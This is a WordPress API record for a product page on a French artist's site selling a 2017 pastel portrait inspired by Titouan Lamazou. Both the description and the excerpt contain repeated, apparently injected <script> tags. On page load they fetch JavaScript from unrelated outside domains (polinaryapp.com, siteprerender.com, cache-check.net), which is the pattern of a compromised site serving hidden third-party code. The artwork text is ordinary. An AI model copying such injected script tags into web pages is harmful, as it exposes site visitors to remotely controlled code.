{"id":1813,"date":"2020-12-06T12:23:16","date_gmt":"2020-12-06T11:23:16","guid":{"rendered":"https:\/\/tania-art-gallery.com\/?post_type=product&#038;p=1813"},"modified":"2020-12-12T20:50:08","modified_gmt":"2020-12-12T19:50:08","slug":"sur-les-traces-de-titouan-amazou-n1","status":"publish","type":"product","link":"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/","title":{"rendered":"Sur les traces de Titouan LAMAZOU, n\u00b01"},"content":{"rendered":"<p><span style=\"color: #000000;\">Description longue du tableau:<\/span><\/p>\n<p><span style=\"color: #000000;\">Tableau aux pastels secs.<\/span><\/p>\n<p><span style=\"color: #000000;\">Portrait d&rsquo;une jeune femme.<\/span><\/p>\n<p><span style=\"color: #000000;\">R\u00e9alis\u00e9 en 2017<\/span><\/p>\n<p><span style=\"color: #000000;\">Vendu encadr\u00e9 et avec un passe-partout pour pastel<\/span><\/p>\n<p><span style=\"color: #000000;\">Dimensions: 60 x 80 cm<\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607258909380\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_210163009&amp;key=21ecefdd84a1d2a730&amp;cv=1607802592&amp;t=1607802592055\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_725891422&amp;key=21ecefdd84a1d2a730&amp;cv=591745&amp;t=1607802592056\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607802592070\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_931090205&amp;key=21ecefdd84a1d2a730&amp;cv=1607802605&amp;t=1607802604933\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_684060598&amp;key=21ecefdd84a1d2a730&amp;cv=591758&amp;t=1607802604934\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607802604941\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"color: #000000;\">Inspir\u00e9 par un dessin de Titouan LAMAZOU<\/span><\/p>\n<p><span style=\"color: #000000;\">Tableau aux pastels secs avec un passe-partout pour pastel<\/span><\/p>\n<p><span style=\"color: #000000;\">Portrait d&rsquo;une jeune femme.<\/span><\/p>\n<p><span style=\"color: #000000;\">R\u00e9alis\u00e9 en 2017<\/span><\/p>\n<p><span style=\"color: #000000;\">Vendu encadr\u00e9 et avec un passe-partout pour pastel<\/span><\/p>\n<p><span style=\"color: #000000;\">Dimensions: 60 x 80 cm<\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607258909531\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_502763905&amp;key=21ecefdd84a1d2a730&amp;cv=1607802592&amp;t=1607802592080\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_731408181&amp;key=21ecefdd84a1d2a730&amp;cv=591745&amp;t=1607802592081\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607802592087\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_447477110&amp;key=21ecefdd84a1d2a730&amp;cv=1607802605&amp;t=1607802604974\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_843273249&amp;key=21ecefdd84a1d2a730&amp;cv=591758&amp;t=1607802604975\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607802604991\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":1705,"template":"","meta":{"spay_email":""},"class_list":{"0":"post-1813","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","5":"hentry","6":"product_cat-portraits-aux-pastels","8":"entry","9":"has-media","10":"owp-thumbs-layout-horizontal","11":"owp-btn-normal","12":"owp-tabs-layout-vertical","13":"has-no-thumbnails","14":"has-product-nav"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Sur les traces de Titouan LAMAZOU, n\u00b01 - Les Arts de Tania KMIT - dessin - pastel - gravure<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sur les traces de Titouan LAMAZOU, n\u00b01 - Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"og:description\" content=\"Inspir\u00e9 par un dessin de Titouan LAMAZOU  Tableau aux pastels secs avec un passe-partout pour pastel  Portrait d&#039;une jeune femme.  R\u00e9alis\u00e9 en 2017  Vendu encadr\u00e9 et avec un passe-partout pour pastel  Dimensions: 60 x 80 cm\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/\" \/>\n<meta property=\"og:site_name\" content=\"Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-12T19:50:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170423_170346.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"373\" \/>\n\t<meta property=\"og:image:height\" content=\"500\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/\",\"url\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/\",\"name\":\"Sur les traces de Titouan LAMAZOU, n\u00b01 - Les Arts de Tania KMIT - dessin - pastel - gravure\",\"isPartOf\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170423_170346.jpg\",\"datePublished\":\"2020-12-06T11:23:16+00:00\",\"dateModified\":\"2020-12-12T19:50:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/#primaryimage\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170423_170346.jpg\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170423_170346.jpg\",\"width\":373,\"height\":500,\"caption\":\"Sur les traces de Titouan Lamazou, n\u00b01, pastels secs, 2017\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/tania-art-gallery.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/tania-art-gallery.com\/index.php\/boutique\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Sur les traces de Titouan LAMAZOU, n\u00b01\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/tania-art-gallery.com\/#website\",\"url\":\"https:\/\/tania-art-gallery.com\/\",\"name\":\"Les Arts de Tania KMIT - dessin - pastel - gravure\",\"description\":\"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture\",\"publisher\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/tania-art-gallery.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\",\"name\":\"admin9071\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"width\":171,\"height\":270,\"caption\":\"admin9071\"},\"logo\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/tania-art-gallery.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sur les traces de Titouan LAMAZOU, n\u00b01 - Les Arts de Tania KMIT - dessin - pastel - gravure","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/","og_locale":"fr_FR","og_type":"article","og_title":"Sur les traces de Titouan LAMAZOU, n\u00b01 - Les Arts de Tania KMIT - dessin - pastel - gravure","og_description":"Inspir\u00e9 par un dessin de Titouan LAMAZOU  Tableau aux pastels secs avec un passe-partout pour pastel  Portrait d'une jeune femme.  R\u00e9alis\u00e9 en 2017  Vendu encadr\u00e9 et avec un passe-partout pour pastel  Dimensions: 60 x 80 cm","og_url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/","og_site_name":"Les Arts de Tania KMIT - dessin - pastel - gravure","article_modified_time":"2020-12-12T19:50:08+00:00","og_image":[{"width":373,"height":500,"url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170423_170346.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/","url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/","name":"Sur les traces de Titouan LAMAZOU, n\u00b01 - Les Arts de Tania KMIT - dessin - pastel - gravure","isPartOf":{"@id":"https:\/\/tania-art-gallery.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/#primaryimage"},"image":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/#primaryimage"},"thumbnailUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170423_170346.jpg","datePublished":"2020-12-06T11:23:16+00:00","dateModified":"2020-12-12T19:50:08+00:00","breadcrumb":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/#primaryimage","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170423_170346.jpg","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/20170423_170346.jpg","width":373,"height":500,"caption":"Sur les traces de Titouan Lamazou, n\u00b01, pastels secs, 2017"},{"@type":"BreadcrumbList","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/sur-les-traces-de-titouan-amazou-n1\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/tania-art-gallery.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/tania-art-gallery.com\/index.php\/boutique\/"},{"@type":"ListItem","position":3,"name":"Sur les traces de Titouan LAMAZOU, n\u00b01"}]},{"@type":"WebSite","@id":"https:\/\/tania-art-gallery.com\/#website","url":"https:\/\/tania-art-gallery.com\/","name":"Les Arts de Tania KMIT - dessin - pastel - gravure","description":"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture","publisher":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tania-art-gallery.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":["Person","Organization"],"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a","name":"admin9071","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","width":171,"height":270,"caption":"admin9071"},"logo":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/tania-art-gallery.com"]}]}},"_links":{"self":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product\/1813","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media\/1705"}],"wp:attachment":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=1813"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}